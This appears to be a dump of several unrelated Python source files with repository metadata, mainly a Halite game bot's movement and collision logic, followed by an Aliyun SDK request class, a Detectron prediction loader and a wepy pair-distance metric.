    # Wrap-aware distance in each of the four directions.
    dist_w = (source.x - destination.x) % self.w
    dist_e = (destination.x - source.x) % self.w
    dist_n = (source.y - destination.y) % self.h
    dist_s = (destination.y - source.y) % self.h
    if dist_w == 0 and dist_n == 0:
        return False  # already at the destination
    ew_swap = False
    ns_swap = False
    w_neighbor = source.neighbors[WEST]
    e_neighbor = source.neighbors[EAST]
    n_neighbor = source.neighbors[NORTH]
    s_neighbor = source.neighbors[SOUTH]
    # --- Choose the east/west component ---------------------------------
    if dist_w < dist_e:
        if through_friendly and w_neighbor.owner != self.my_id:
            if e_neighbor.owner == self.my_id:
                ew_move = (EAST, e_neighbor)
                ew_swap = True  # going the long way around
            else:
                ew_move = None
        else:
            ew_move = (WEST, w_neighbor)
    elif dist_e < dist_w:
        if through_friendly and e_neighbor.owner != self.my_id:
            if w_neighbor.owner == self.my_id:
                ew_move = (WEST, w_neighbor)
                ew_swap = True
            else:
                ew_move = None
        else:
            ew_move = (EAST, e_neighbor)
    elif dist_w == 0:
        ew_move = None
    elif dist_w == dist_e:
        if through_friendly and (w_neighbor.owner != self.my_id or e_neighbor.owner != self.my_id):
            if w_neighbor.owner != self.my_id and e_neighbor.owner != self.my_id:
                ew_move = None
            elif w_neighbor.owner == self.my_id and e_neighbor.owner != self.my_id:
                ew_move = (WEST, w_neighbor)
            else:
                ew_move = (EAST, e_neighbor)
        else:
            # Equidistant both ways: prefer the move with lower production.
            if e_neighbor.production < w_neighbor.production:
                ew_move = (EAST, e_neighbor)
            else:
                ew_move = (WEST, w_neighbor)
    # --- Choose the north/south component --------------------------------
    if dist_s < dist_n:
        if through_friendly and s_neighbor.owner != self.my_id:
            if n_neighbor.owner == self.my_id:
                ns_move = (NORTH, n_neighbor)
                ns_swap = True
            else:
                ns_move = None
        else:
            ns_move = (SOUTH, s_neighbor)
    elif dist_n < dist_s:
        if through_friendly and n_neighbor.owner != self.my_id:
            if s_neighbor.owner == self.my_id:
                ns_move = (SOUTH, s_neighbor)
                ns_swap = True
            else:
                ns_move = None
        else:
            ns_move = (NORTH, n_neighbor)
    elif dist_s == 0:
        ns_move = None
    elif dist_s == dist_n:
        if through_friendly and (s_neighbor.owner != self.my_id or n_neighbor.owner != self.my_id):
            if s_neighbor.owner != self.my_id and n_neighbor.owner != self.my_id:
                ns_move = None
            elif s_neighbor.owner == self.my_id and n_neighbor.owner != self.my_id:
                ns_move = (SOUTH, s_neighbor)
            else:
                ns_move = (NORTH, n_neighbor)
        else:
            # Equidistant both ways: prefer the move with lower production.
            if n_neighbor.production < s_neighbor.production:
                ns_move = (NORTH, n_neighbor)
            else:
                ns_move = (SOUTH, s_neighbor)
    if ns_move is None and ew_move is None:
        return False
    # Order the one or two candidates: non-swap axis first, then lower production.
    path_choices = []
    if ns_move is None:
        path_choices.append(ew_move)
    elif ew_move is None:
        path_choices.append(ns_move)
    elif ns_swap is True and ew_swap is False:
        path_choices.append(ew_move)
        path_choices.append(ns_move)
    elif ns_swap is False and ew_swap is True:
        path_choices.append(ns_move)
        path_choices.append(ew_move)
    else:
        if ew_move[1].production < ns_move[1].production:
            path_choices.append(ew_move)
            path_choices.append(ns_move)
        else:
            path_choices.append(ns_move)
            path_choices.append(ew_move)
    # Try simple resolution: step onto a square whose projected strength
    # stays under the cap. (BUGFIX: the original ran this identical loop
    # twice back-to-back; the second pass could never do anything the first
    # had not, so the duplicate has been removed.)
    for (direction, target) in path_choices:
        future_strength = 0
        if target.owner == self.my_id:
            if target.move == -1 or target.move == STILL:
                future_strength = target.strength  # + target.production
                for sq in target.moving_here:
                    future_strength += sq.strength
        if future_strength + source.strength <= self.str_cap:
            self.make_move(source, direction, destination)
            return True
    for (direction, target) in path_choices:
        # Ok, can we move the cell that we are moving to?
        if target.owner == self.my_id:
            # Only if the blocker is staying still can we do anything.
            if target.move == STILL or target.move == -1:
                # Make sure that moving this piece actually does something.
                future_strength = source.strength
                for sq in target.moving_here:
                    future_strength += sq.strength
                if future_strength <= self.str_cap:
                    # Queue our move; undo below if the blocker can't be moved.
                    self.make_move(source, direction, destination)
                    n_directions = list(range(4))
                    # NOTE(review): n_neighbors is sorted but the loop below
                    # iterates n_directions, so the sort has no effect.
                    n_neighbors = [(nd, target.neighbors[nd]) for nd in n_directions]
                    n_neighbors.sort(key=lambda x: x[1].production)
                    n_neighbors.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
                    # Try moving the blocker to one of its own neighbors.
                    for n_d in n_directions:
                        n = target.neighbors[n_d]
                        if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
                            # Can we move into this square safely?
                            future_n_t_strength = target.strength
                            if n.move == STILL or n.move == -1:
                                future_n_t_strength += n.strength  # + n.production
                                for n_moving in n.moving_here:
                                    future_n_t_strength += n_moving.strength
                            if future_n_t_strength <= self.str_cap:
                                success = self.move_square_to_target_simple(target, n, True)
                                if success:
                                    return True
                    # TODO: Logic to attempt to capture a neutral cell if we want.
                    self.make_move(source, -1, None)
    # Nothing to do left.
    return False
def find_nearest_non_owned_border(self, sq):
    """Step sq one square down the border-distance gradient, preferring the
    direction with the least of our own strength nearby."""
    here = self.distance_from_border[sq.x, sq.y]
    if here == 1:
        # NOTE(review): no return here -- the square is marked STILL but the
        # loop below may still override it; confirm this is intentional.
        self.make_move(sq, STILL, None)
    candidates = [n for n in sq.neighbors
                  if self.is_owned_map[n.x, n.y]
                  and self.distance_from_border[n.x, n.y] == here - 1]
    candidates.sort(key=lambda s: self.own_strength_map[5, s.x, s.y])
    for n in candidates:
        if self.move_square_to_target(sq, n, True):
            break
def find_nearest_combat_zone(self, sq):
    """Step sq one square down the combat-zone-distance gradient, preferring
    the direction with the least of our own strength already committed."""
    here = self.distance_from_combat_zone[sq.x, sq.y]
    candidates = [n for n in sq.neighbors
                  if self.is_owned_map[n.x, n.y]
                  and self.distance_from_combat_zone[n.x, n.y] == here - 1]
    candidates.sort(key=lambda s: self.own_strength_map[7, s.x, s.y])
    for n in candidates:
        if self.move_square_to_target(sq, n, True):
            break
def move_towards_map_old(self, sq, distance_map, through_friendly=True):
    """Move sq one step down the given distance gradient (toward 0),
    preferring squares with high nearby enemy strength, then low production.

    NOTE: `through_friendly` is accepted for interface compatibility but the
    internal move call always routes through friendly squares.
    """
    here = distance_map[sq.x, sq.y]
    options = [n for n in sq.neighbors
               if self.is_owned_map[n.x, n.y] and distance_map[n.x, n.y] == here - 1]
    if options:
        # Stable sorts: enemy strength dominates, production breaks ties.
        options.sort(key=lambda n: n.production)
        options.sort(key=lambda n: self.enemy_strength_map[4, n.x, n.y], reverse=True)
        self.move_square_to_target(sq, options[0], True)
def flood_fill_until_target(self, source, destination, friendly_only):
    """BFS outward from `destination` until `source` is reached.

    Returns a (w, h) int grid of distances from the destination, with -1
    for squares never reached. When `friendly_only` is set, the fill only
    expands through squares we own.
    """
    distance_matrix = np.full((self.w, self.h), -1, dtype=int)
    distance_matrix[destination.x, destination.y] = 0
    frontier = [destination]
    # Stop as soon as the source has a distance -- we only need its path.
    while frontier and distance_matrix[source.x, source.y] == -1:
        current = frontier.pop(0)
        next_dist = distance_matrix[current.x, current.y] + 1
        for nb in current.neighbors:
            if distance_matrix[nb.x, nb.y] != -1:
                continue
            if friendly_only and nb.owner != self.my_id:
                continue
            distance_matrix[nb.x, nb.y] = next_dist
            frontier.append(nb)
    return distance_matrix
def flood_fill_to_border(self, sources):
    """BFS distances from `sources`, expanding only through squares we own.

    Non-owned squares get a distance recorded but are never expanded, so
    the fill stops at the border. Returns a (w, h) grid with -1 for
    unreached squares. NOTE: the caller's `sources` list is consumed.
    """
    distance_matrix = np.ones((self.w, self.h)) * -1
    if len(sources) == 0:
        return distance_matrix
    for sq in sources:
        distance_matrix[sq.x, sq.y] = 0
    frontier = sources  # deliberate aliasing: pops drain the caller's list
    while len(frontier) > 0:
        cur = frontier.pop(0)
        base = distance_matrix[cur.x, cur.y]
        if cur.owner != self.my_id:
            continue  # distance recorded, but don't expand past the border
        for nb in cur.neighbors:
            if distance_matrix[nb.x, nb.y] == -1 or distance_matrix[nb.x, nb.y] > (base + 1):
                distance_matrix[nb.x, nb.y] = base + 1
                frontier.append(nb)
    return distance_matrix
def flood_fill(self, sources, max_distance=999, friendly_only=True):
    """BFS distances from `sources` up to `max_distance`.

    friendly_only=True expands through squares we own; False expands
    through everything we do NOT own. Returns a (w, h) grid with -1 for
    unreached squares. NOTE: the caller's `sources` list is consumed.
    """
    distance_matrix = np.ones((self.w, self.h)) * -1
    if len(sources) == 0:
        return distance_matrix
    for sq in sources:
        distance_matrix[sq.x, sq.y] = 0
    frontier = sources  # deliberate aliasing: pops drain the caller's list
    while len(frontier) > 0:
        cur = frontier.pop(0)
        base = distance_matrix[cur.x, cur.y]
        for nb in cur.neighbors:
            if distance_matrix[nb.x, nb.y] != -1 and distance_matrix[nb.x, nb.y] <= (base + 1):
                continue  # already has an equal-or-better distance
            allowed = (nb.owner == self.my_id) if friendly_only else (nb.owner != self.my_id)
            if allowed:
                distance_matrix[nb.x, nb.y] = base + 1
                if base < max_distance - 1:
                    frontier.append(nb)
    return distance_matrix
@timethis
def last_resort_strength_check(self):
    """Find squares whose projected post-move strength exceeds the cap and
    try to relieve them: move an idle violator aside, or still incoming
    neighbors. Returns the number of violating squares found (None on a
    mid-pass timeout, matching the original early return).

    Production is deliberately ignored in the projection.
    """
    projected_strength_map = np.zeros((self.w, self.h), dtype=int)
    # We only care about our own moves.
    for sq in itertools.chain.from_iterable(self.squares):
        if sq.owner == self.my_id:
            if sq.move == -1 or sq.move == STILL:
                projected_strength_map[sq.x, sq.y] += sq.strength  # + sq.production
            else:
                dx, dy = get_offset(sq.move)
                projected_strength_map[(sq.x + dx) % self.w, (sq.y + dy) % self.h] += sq.strength
    # Squares over the cap, handled closest-to-combat first, strongest first.
    violation_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero((projected_strength_map > self.str_cap)))]
    violation_count = len(violation_squares)
    violation_squares.sort(key=lambda sq: sq.strength, reverse=True)
    violation_squares.sort(key=lambda sq: self.distance_from_combat_zone[sq.x, sq.y])
    for sq in violation_squares:
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        if sq.owner == self.my_id and (sq.move == -1 or sq.move == STILL):
            # The violator itself is idle: push it to a neighbor. This might
            # cause a collision, resolved over multiple iterations.
            possible_paths = []
            for d in range(0, 4):
                n = sq.neighbors[d]
                if n.owner == self.my_id and self.enemy_strength_map[2, n.x, n.y] == 0:
                    possible_paths.append((d, n, projected_strength_map[n.x, n.y]))
                elif (sq.strength > (2 * n.strength)) and (n.production > 2):
                    # Worth attacking a bordering cell instead; the +255
                    # offset ranks these behind all friendly options.
                    possible_paths.append((d, n, n.strength + 255))
            possible_paths.sort(key=lambda x: x[2])
            possible_paths.sort(key=lambda x: self.distance_from_border[x[1].x, x[1].y], reverse=True)
            # BUGFIX: the original called make_move(sq, d, n) with the
            # loop-leaked d/n (i.e. always the last neighbor examined),
            # ignoring the sorts above. Use the best-ranked option; fall
            # back to the last examined neighbor only when nothing ranked.
            if possible_paths:
                d, n, _ = possible_paths[0]
            self.make_move(sq, d, n)
        else:
            # The violator is moving; squares moving here cause the overload.
            options_list = []
            for n in sq.neighbors:
                if n.owner == self.my_id:
                    options_list.append((n, projected_strength_map[n.x, n.y]))
            options_list.sort(key=lambda x: x[1])
            # NOTE(review): this stills *every* friendly neighbor; the
            # commented-out line in the original suggested only the smallest
            # was intended -- behavior kept as-is.
            for opt in options_list:
                self.make_move(opt[0], STILL, None)
            # self.make_move(options_list[0][0], STILL, None)
    return violation_count
@timethis
def stop_swaps(self):
    """Cancel pairs of squares that are pointlessly swapping places.

    A swap is broken only when this square is at least as strong as its
    target and at least as close to the border; both squares are stilled.
    """
    for x in range(self.w):
        for y in range(self.h):
            if (timer() - game.start) > MAX_TURN_TIME:
                return
            if not self.is_owned_map[x, y]:
                continue
            s = self.squares[x, y]
            t = s.target
            if t is None or t not in s.moving_here:
                continue  # not a mutual swap
            if s.strength >= t.strength and \
                    self.distance_from_border[s.x, s.y] <= self.distance_from_border[t.x, t.y]:
                self.make_move(t, STILL, None)
                self.make_move(s, STILL, None)
@timethis
def check_parity(self):
    """Enforce move-parity near enemies: off-parity squares outside direct
    contact are stilled; idle squares in contact try to step forward."""
    # Our squares that feel enemy strength within distance 3.
    indices = np.transpose(np.nonzero((self.is_owned_map * self.enemy_strength_map[3])))
    squares = [self.squares[c[0], c[1]] for c in indices]
    squares.sort(key=lambda sq: sq.strength, reverse=True)
    for s in squares:
        if (timer() - game.start) > MAX_TURN_TIME:
            return
        if (self.enemy_strength_map[2, s.x, s.y] == 0) and s.parity != game.parity and (s.move != STILL and s.move != -1):
            # Off-parity and not in direct contact: cancel the move.
            self.make_move(s, STILL, None)
            # If stilling us would blow the strength cap, also still the
            # weakest incoming squares until we're back under 255.
            future_strength = s.strength + sum(x.strength for x in s.moving_here)
            if future_strength > self.str_cap:
                s.moving_here.sort(key=lambda x: x.strength)
                # make_move(.., STILL, ..) removes the square from
                # s.moving_here, so index 0 advances each iteration.
                while future_strength > 255:
                    future_strength -= s.moving_here[0].strength
                    self.make_move(s.moving_here[0], STILL, None)
        elif (self.enemy_strength_map[2, s.x, s.y] > 0) and (s.move == STILL or s.move == -1):
            # Idle square in direct contact: try to step somewhere useful,
            # e.g. capture a neutral cell.
            neutral_targets = []
            friendly_targets = []
            near_combat = False
            for t in s.neighbors:
                if t.owner == self.my_id:
                    friendly_targets.append(t)
                else:
                    # Non-owned neighbor we could beat; zero strength marks
                    # an active combat square.
                    if s.strength > t.strength:
                        if t.strength == 0:
                            near_combat = True
                        neutral_targets.append(t)
            friendly_targets.sort(key=lambda x: sum(y.strength for y in x.moving_here))
            success = False
            if near_combat:
                # Prefer sidestepping onto a friendly square (least traffic first).
                for t in friendly_targets:
                    future_strength = sum(x.strength for x in t.moving_here) + t.strength if (t.move == STILL or t.move == -1) else 0
                    if future_strength + s.strength <= self.str_cap:
                        success = self.move_square_to_target_simple(s, t, True)
                        if success:
                            break
            if not success:
                # Otherwise take a beatable non-owned neighbor.
                neutral_targets.sort(key=lambda x: sum(y.strength for y in x.moving_here))
                for t in neutral_targets:
                    future_strength = sum(x.strength for x in t.moving_here)
                    if future_strength + s.strength <= self.str_cap:
                        success = self.move_square_to_target_simple(s, t, False)
                        if success:
                            break
def overkill_check(self):
    """Reduce overkill losses near the combat zone: hold isolated front-line
    squares still, and break up A -> B -> 0 <- C pile-ups two cells out."""
    one_away_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.distance_from_combat_zone == 1))]
    for sq in one_away_squares:
        # Isolated squares that are near enemies can stay still.
        if sq.owner == self.my_id:
            if sq.is_isolated():
                # Check diagonals: if another isolated idle friendly square
                # sits diagonally adjacent, let them act instead of stilling.
                diagonals = [(-1, -1), (1, 1), (-1, 1), (1, -1)]
                should_still = True
                for (dx, dy) in diagonals:
                    dsq = self.squares[(sq.x + dx) % self.w, (sq.y + dy) % self.h]
                    # move == 4 is STILL; move == -1 is unassigned.
                    if dsq.owner == self.my_id and dsq.is_isolated() and (dsq.move == 4 or dsq.move == -1):
                        should_still = False
                        break
                if should_still:
                    self.make_move(sq, STILL, None)
    two_away_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.distance_from_combat_zone == 2))]
    two_away_squares = [x for x in two_away_squares if x.owner == self.my_id and x.strength > 0]
    for sq in two_away_squares:
        # Check the situation in which A -> B -> 0 <- C:
        # A (sq) moves to B, B moves onto an empty neutral square that an
        # enemy (C) may also contest.
        if sq.move != -1 and sq.move != 4:
            b = sq.target
            if b.move != -1 and b.move != 4:
                if b.target.owner == 0 and b.target.strength == 0:
                    # around() -> (friendly, neutral>0, neutral==0, enemy)
                    f, n, c, e = b.around()
                    if c == 1:
                        # Inspect the contested empty square ("oh").
                        oh = b.target
                        of, on, oc, oe = oh.around()
                        if oe >= 1:
                            # Enemy can also step in: either hold A back (if B
                            # can win the square) or hold B back.
                            e_str = self.enemy_strength_map[1, oh.x, oh.y]
                            if b.strength > e_str:
                                self.make_move(sq, STILL, None)
                            else:
                                self.make_move(b, STILL, None)
# ==============================================================================
# Square class
# ==============================================================================
class Square:
def __init__(self, game, x, y, production):
self.game = game
self.x, self.y = x, y
self.production = production
self.w, self.h = game.w, game.h
self.vertex = x * self.h + y
self.target = None
self.moving_here = []
self.far_target = None
self.parity = (x + y) % 2
def after_init_update(self):
# Should only be called after all squares in game have been initialized.
self.north = self.game.squares[(self.x + 0) % self.w, (self.y - 1) % self.h]
self.east = self.game.squares[(self.x + 1) % self.w, (self.y + 0) % self.h]
self.south = self.game.squares[(self.x + 0) % self.w, (self.y + 1) % self.h]
self.west = self.game.squares[(self.x - 1) % self.w, (self.y + 0) % self.h]
self.neighbors = [self.north, self.east, self.south, self.west] # doesn't include self
def get_neighbors(self, n=1, include_self=False):
# Returns a list containing all neighbors within n squares, excluding self unless include_self = True
assert isinstance(include_self, bool)
assert isinstance(n, int) and n > 0
if n == 1:
if not include_self:
return self.neighbors
combos = ((dx, dy) for dy in range(-n, n + 1) for dx in range(-n, n + 1) if abs(dx) + abs(dy) <= n)
return (self.game.squares[(self.x + dx) % self.w][(self.y + dy) % self.h] for dx, dy in combos if include_self or dx or dy)
def update(self, owner, strength):
# updates the square with the new owner and strength. Also resets movement variables
self.owner = owner
self.strength = strength
self.reset_move()
def reset_move(self):
# Resets the move information
# Note, the target's moving_here is NOT reset so this should really only be used if all squares are being reset.
self.move = -1
self.target = None
self.moving_here = []
self.far_target = None
def around(self):
# Returns (Friendly, Neutral > 0, Neutral == 0, enemy)
friendly = 0
neutral = 0
combat = 0
enemy = 0
for sq in self.neighbors:
if sq.owner == self.game.my_id:
friendly += 1
elif sq.owner != 0:
enemy += 1
else:
if sq.strength > 0:
neutral += 1
else:
combat += 1
return (friendly, neutral, combat, enemy)
def overkill_safe(self):
# Is it safe to move to this square??
# STILL
move_away = []
check = [self.north, self.west, self.east, self.south, self]
for n in check:
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# NORTH
move_away = []
check = [self.north.north, self.north.west, self.north.east, self.north, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# South
move_away = []
check = [self.south.south, self.south.west, self.south.east, self.south, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# West
move_away = []
check = [self.west.south, self.west.north, self.west.west, self.west, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
# East
move_away = []
check = [self.east.south, self.east.north, self.east.east, self.east, self]
for n in check:
if n.owner == self.my_id and (n.move == -1 or n.move == 4):
move_away.append(n)
for m in n.moving_here:
move_away.append(n)
if len(move_away) > 1:
return (False, move_away)
return (True, [])
def is_isolated(self):
    """Return True when no neighbouring square shares this square's owner."""
    # Idiomatic form of the original flag-and-loop scan.
    return all(neighbor.owner != self.owner for neighbor in self.neighbors)
####################
# Helper Functions #
####################
def get_offset(direction):
    """Map a direction index (NORTH, EAST, SOUTH, WEST, STILL) to (dx, dy)."""
    offsets = ((0, -1), (1, 0), (0, 1), (-1, 0), (0, 0))
    return offsets[direction]
def opposite_direction(direction):
    """Return the reverse of a cardinal direction; STILL is its own opposite."""
    if direction == STILL:
        return STILL
    return (direction + 2) % 4
def roll_xy(M, x, y):
    """Toroidally shift matrix M by x along axis 0 and y along axis 1."""
    shifted = np.roll(M, x, axis=0)
    return np.roll(shifted, y, axis=1)
def spread_n(M, n, decay=0, include_self=True):
    """Build an influence map by smearing M to every cell within distance n.

    Each ring at Manhattan distance d contributes a copy of M rolled by
    every offset at that distance, weighted by exp(-decay * d).  When
    include_self is True the unshifted map is included as well.
    """
    if include_self is True:
        spread_map = np.copy(M)
    else:
        spread_map = np.zeros_like(M)
    for distance in range(1, n + 1):
        weight = math.exp(-decay * distance)
        for dx, dy in get_all_d_away(distance):
            spread_map += roll_xy(np.multiply(weight, M), dx, dy)
    return spread_map
def get_all_d_away(d):
    """Return all (x, y) integer offsets at exactly Manhattan distance d."""
    combos = []
    for x in range(d + 1):
        x_options = {x, -x}
        y_options = {d - x, -(d - x)}
        combos.extend(itertools.product(x_options, y_options))
    # Deduplicate (x=0 / y=0 rows generate mirrored duplicates).
    return list(set(combos))
def rebase_map(map_a, total=True):
    """Rescale map_a so that its entries sum to a target cell count.

    With total=True the target is the total number of cells in the map;
    with total=False it is the number of non-zero cells.
    """
    if total:
        target = functools.reduce(lambda acc, dim: acc * dim, map_a.shape)
    else:
        target = np.sum(map_a != 0)
    return np.multiply(map_a, target / np.sum(map_a))
# ==============================================================================
# Functions for communicating with the Halite game environment (formerly contained in separate module networking.py
# ==============================================================================
def translate_cardinal(direction):
    """Convert a framework direction index into the game engine's encoding.

    Framework: NORTH=0, EAST=1, SOUTH=2, WEST=3, STILL=4.
    Game:      STILL=0, NORTH=1, EAST=2, SOUTH=3, WEST=4.
    """
    shifted = (direction + 1) % 5
    return int(shifted)
def send_string(to_be_sent):
    """Write one line to stdout and flush so the game engine sees it now."""
    out = sys.stdout
    out.write(to_be_sent + "\n")
    out.flush()
def get_string():
    """Read one line from stdin with the trailing newline stripped."""
    line = sys.stdin.readline()
    return line.rstrip('\n')
# ==============================================================================
# Game Loop
# ==============================================================================
def game_loop():
    """Run one game turn: update state, pick moves, then repeatedly repair
    collisions, bailing out whenever the turn-time budget is exhausted.

    The original repeated the same collision-drain loop three times; the
    helpers below keep the identical check ordering and time-budget
    behaviour in one place.
    """
    game.start = timer()

    def out_of_time():
        return (timer() - game.start) > MAX_TURN_TIME

    def resolve_collisions():
        # Iterate the last-resort strength check until it stops making
        # progress (the returned count no longer shrinks).  Returns False
        # if the time budget ran out mid-loop.
        collision_check = 998
        last_collision_check = 999
        while collision_check < last_collision_check:
            if out_of_time():
                return False
            last_collision_check = collision_check
            collision_check = game.last_resort_strength_check()
        return True

    game.update()
    if out_of_time():
        return
    game.get_moves()
    if out_of_time():
        return
    game.stop_swaps()
    if not resolve_collisions():
        return
    if out_of_time():
        return
    game.check_parity()
    if not resolve_collisions():
        return
    game.overkill_check()
    resolve_collisions()
# #####################
# Game run-time code #
# #####################
# --- Game run-time entry point ---------------------------------------------
# NOTE(review): indentation was lost in this dump; the `pr = ...` lines
# belong under `if (profile):` and the frame calls under `while True:`.
logging.basicConfig(filename='logging.log', level=logging.DEBUG)
# logging.debug('your message here')
# Direction encoding used throughout the bot.
NORTH, EAST, SOUTH, WEST, STILL = range(5)
# Optional cProfile instrumentation, gated by the module-level `profile` flag.
if (profile):
pr = cProfile.Profile()
pr.enable()
game = Game()
# Main frame loop: read the map, compute this turn's moves, send them back.
while True:
game.get_frame()
game_loop()
game.send_frame()
# Dump profiling stats near the end of a standard 200-frame game.
if profile and game.frame == 199:
pr.disable()
pr.dump_stats("test.prof")
| [
"nick@narmi.com"
] | nick@narmi.com |
0965831befd1d9b3c359c1e3361b6e2a5064d506 | ccbfc7818c0b75929a1dfae41dc061d5e0b78519 | /aliyun-openapi-python-sdk-master/aliyun-python-sdk-cs/aliyunsdkcs/request/v20151215/DescribeClusterTokensRequest.py | a005fcd3967fcf1bfce0a52277c2b2397cd22a89 | [
"Apache-2.0"
] | permissive | P79N6A/dysms_python | 44b634ffb2856b81d5f79f65889bfd5232a9b546 | f44877b35817e103eed469a637813efffa1be3e4 | refs/heads/master | 2020-04-28T15:25:00.368913 | 2019-03-13T07:52:34 | 2019-03-13T07:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
class DescribeClusterTokensRequest(RoaRequest):
# ROA-style request for the Container Service (CS, API version 2015-12-15)
# DescribeClusterTokens endpoint.
def __init__(self):
RoaRequest.__init__(self, 'CS', '2015-12-15', 'DescribeClusterTokens')
# REST path template; [ClusterId] is substituted from the path params.
self.set_uri_pattern('/clusters/[ClusterId]/tokens')
self.set_method('GET')
def get_ClusterId(self):
return self.get_path_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_path_param('ClusterId',ClusterId) | [
"1478458905@qq.com"
] | 1478458905@qq.com |
33c88c043e19e96f7ec08c9b8158b562e0b70726 | 3cd4902b67de144d8e6f36335e125d0548d8cf97 | /tools/detecting/detectron/DetectronDetector.py | d0414990eb597a4ad1c3d6b3ff9435d39727a628 | [
"MIT"
] | permissive | stefantaubert/imageclef-lifelog-2019 | 5d201c2a28f15f608b9b58b94ab2ecddb5201205 | ad49dc79db98a163c5bc282fb179c0f7730546b3 | refs/heads/master | 2022-10-06T12:42:30.011610 | 2022-08-29T13:35:09 | 2022-08-29T13:35:09 | 196,553,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import pickle
from src.detecting.DetectorBase import DetectorBase
from src.detecting.img_path_parser import get_paths
from src.io.paths import get_path_detectron
from src.globals import usr1
"""
I run detectron on remote machine and save the results as a dictionary with keys = image_id and values: class predictions.
This dictionary will be loaded as model.
The threshold is set to 0.5
"""
class DetectronDetector(DetectorBase):
    """Detector that replays precomputed Detectron predictions.

    Detectron was run remotely; its per-image class predictions
    (threshold 0.5) were pickled as a dict keyed by image id, and that
    dict is loaded here instead of running the model locally.
    """

    def __init__(self):
        print("Load predictions from detectron...")
        # BUGFIX: open the pickle inside a `with` block so the file
        # handle is closed (the original leaked a bare open()).
        with open("/tmp/pred.pkl", "rb") as pred_file:
            # latin1 keeps Python2-era pickles loadable
            self.predictions = pickle.load(pred_file, encoding='latin1')
        print("Preprocessing...")
        # Invert (image_id, image_path) pairs into a path -> id lookup.
        paths = get_paths()
        self.ids_to_paths = {}
        for entry in paths:
            self.ids_to_paths[entry[1]] = entry[0]

    def detect_image(self, img):
        """Return the stored predictions for an image path ([] if unknown)."""
        img_id = self.ids_to_paths[img]
        return self.predictions.get(img_id, [])
if __name__ == "__main__":
d = DetectronDetector()
csv = d.detect_images_auto(usr1)
file_name = get_path_detectron(usr=usr1)
csv.to_csv(file_name, index=False)
print("Successfully saved to", file_name) | [
"stefan.taubert@posteo.de"
] | stefan.taubert@posteo.de |
df7c68265d10a6433fd2266a5d72fd920abbefbb | 11e8bf1ae982cf4aefcc8f146a7d706e854ea8bb | /royale/urls.py | ca5d0de7fc1b38c336288ea9bf9582a93b0c5b42 | [] | no_license | DK-denno/royalAndRich | d9801a8bb26b915a3c6d0e09e3930f4339ff8c52 | 91e36257ce8ea192ff65c993aab7ea23958dc3c5 | refs/heads/master | 2023-08-26T14:16:13.306965 | 2020-02-20T10:10:42 | 2020-02-20T10:10:42 | 240,218,352 | 0 | 0 | null | 2021-09-22T18:36:12 | 2020-02-13T09:07:42 | CSS | UTF-8 | Python | false | false | 460 | py | from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from . import views
#Your views go here
# URL routes for the royale app: home, about, per-class detail and contact.
urlpatterns=[
path(r'',views.index,name="home"),
path(r'about/',views.about,name='about'),
# Class detail page keyed by an integer class code.
path(r'classes/<int:code>/',views.classes,name="classes"),
path(r'contact/',views.contact,name="contact"),
]
# Serve user-uploaded media from MEDIA_ROOT during development only.
if settings.DEBUG:
urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"dennisveer27@gmail.com"
] | dennisveer27@gmail.com |
5dbf192b4ecf8a9c22c3a203e1bcfe82214a1d63 | eacfc0cddb477973a3ca491f35da14b1bda477c3 | /src/wepy_tools/sim_makers/openmm/lennard_jones.py | 4a7c741bdea75a841d2beeb2cc3d469f75dffb90 | [
"MIT"
] | permissive | edeustua/wepy | 933ccb4c15b4a80393700333a04fd01f229e27e3 | f1a2ef5c8cc368d5602c9d683983b3af69a48ce2 | refs/heads/master | 2020-09-29T04:40:55.759360 | 2019-12-06T23:33:11 | 2019-12-06T23:33:11 | 226,952,678 | 0 | 0 | MIT | 2019-12-09T19:40:26 | 2019-12-09T19:40:25 | null | UTF-8 | Python | false | false | 2,492 | py | import numpy as np
from scipy.spatial.distance import euclidean
from wepy.runners.openmm import GET_STATE_KWARG_DEFAULTS
from wepy.resampling.distances.distance import Distance
from wepy.boundary_conditions.receptor import UnbindingBC
from openmmtools.testsystems import LennardJonesPair
from wepy_tools.sim_makers.openmm import OpenMMToolsTestSysSimMaker
## Distance Metric
# we define a simple distance metric for this system, assuming the
# positions are in a 'positions' field
class PairDistance(Distance):
    """Distance metric comparing the particle-pair separation of two states.

    States are assumed to expose their coordinates under a 'positions'
    field holding the two particles' positions.
    """

    def __init__(self, metric=euclidean):
        # callable used to measure the separation between the two particles
        self.metric = metric

    def image(self, state):
        """The image of a state is simply its positions array."""
        return state['positions']

    def image_distance(self, image_a, image_b):
        """Absolute difference between the two pair separations."""
        sep_a = self.metric(image_a[0], image_a[1])
        sep_b = self.metric(image_b[0], image_b[1])
        return np.abs(sep_a - sep_b)
